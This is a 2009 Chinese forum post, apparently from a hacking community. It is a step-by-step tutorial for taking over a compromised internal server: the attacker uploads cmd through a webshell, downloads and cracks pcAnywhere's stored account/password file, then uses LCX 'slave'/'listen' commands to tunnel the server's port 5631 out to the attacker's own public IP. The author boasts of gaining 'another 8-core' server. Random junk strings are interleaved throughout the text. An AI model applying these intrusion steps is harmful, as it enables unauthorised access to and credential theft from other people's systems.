|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
# Q1 ?5 G+ V0 \; z) s5 l
* Q, i% K! E9 S3 D; W2 k9 o提权方法:pcanywhere+LCX' `( S$ w/ l& F
) \/ m# B0 f3 z
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
. R# {; F& l+ M i$ h1 @6 c9 x0 \& t! T9 [
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
* m1 Q2 j; B+ ^$ n* Z' n; s0 J+ T- l0 h
* \* j* O8 R& K% Z( p
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
' M( g6 |* k2 A
. n6 W3 l9 y* u6 W; [& v7 H
3 z5 a- ] Z) Z呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
& P& }6 u$ M& l/ b: W! R7 r c+ ]) c4 J- P9 s! K- U; ^% e3 n
' u, [& r3 i$ D5 p. v" _9 m2 ~2 H1 i* K7 n* j% q8 s
E* l8 K5 R; n4 d3 F! j
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
9 y. Z+ Y4 n e1 m( [, j% k$ s1 N+ [2 Z# A _2 B5 }- Q
$ R( {6 ^, f5 E
LCX的用法再简单说下:
1 D8 ]8 C% f; m3 w! L' q
3 V( d" T' C# L服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
) S- N) x) H, Z! w3 {+ q7 ^; _7 T3 h1 v$ U' ]
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
( U! t, K0 w5 ~$ X, D* K4 ]4 @- @% j# R' e8 b$ d/ X! N4 R
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
4 ?6 J/ J9 b& @ P& n1 b! n顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``: Z3 N& c9 u2 G+ n
7 L: B7 w& M, }0 H! S
2 g3 ?) Z4 i8 F6 x9 C6 }# @+ {
6 F2 Q- Q1 [/ V4 N: H" d. [1 U' Y' A% P+ k3 p2 m Q5 S4 x
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
6 Y, v4 Z+ Q8 ?. w6 z1 |1 G
( ?! S% G1 S$ m& \9 Z: t! D. d* J3 i: ^- e( M: W. `
, s6 H+ H3 R. J) a0 r
f+ L) X; `% K我们本地连接试试,输入我们刚破解的账号密码9 K( k5 h8 h: u( @& p/ r1 e
- U% l8 j5 u* v& [, Q! H( S9 d$ p
( t+ \% L/ D' G5 [' c呵呵``连接成功,服务器不错,又一个8核^︵^5 w" g8 k7 M6 M
: \) y8 [# E( F/ R
9 A9 k* y1 e& [/ ~1 o# X
, I( Y% y$ `( D: H- W |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
